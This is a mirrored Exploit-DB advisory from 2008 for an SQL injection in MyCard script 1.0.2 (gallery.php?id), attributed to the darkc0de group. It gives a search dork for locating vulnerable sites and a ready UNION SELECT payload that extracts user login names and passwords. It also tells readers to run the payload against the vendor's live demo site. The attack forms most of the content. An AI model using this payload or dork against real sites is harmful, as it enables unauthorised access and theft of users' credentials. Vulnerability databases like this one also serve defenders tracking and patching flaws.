- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6603
- Проверка EDB
-
- Пройдено
- Автор
- R45C4L
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4738
- Дата публикации
- 2008-09-27
Код:
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz #
# and all darkc0de and NikTrix members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com & niktrix.info
#
# Email : [email protected]
#
# Share the c0de!
#
################################################################
#
# Title: MyCard script 1.0.2 (gallery.php?id) SQL Injection
#
# VEndor: http://www.tufat.com/s_business_card_designer.htm
#
#
###########################################################
#
# d0rk: Powered by MyCard
#
###########################################################
POC :-
http://www.site.com/[path]/gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user/*
Live Demo:
For live demo first go here : http://demo.tufat.com/mycard/index.php and register and then u can test like this :
http://demo.tufat.com/mycard/gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user/*
###########################################################
#
# Bug discovered : 28 Sep.2008
###########################################################
# milw0rm.com [2008-09-27]
- Источник
- www.exploit-db.com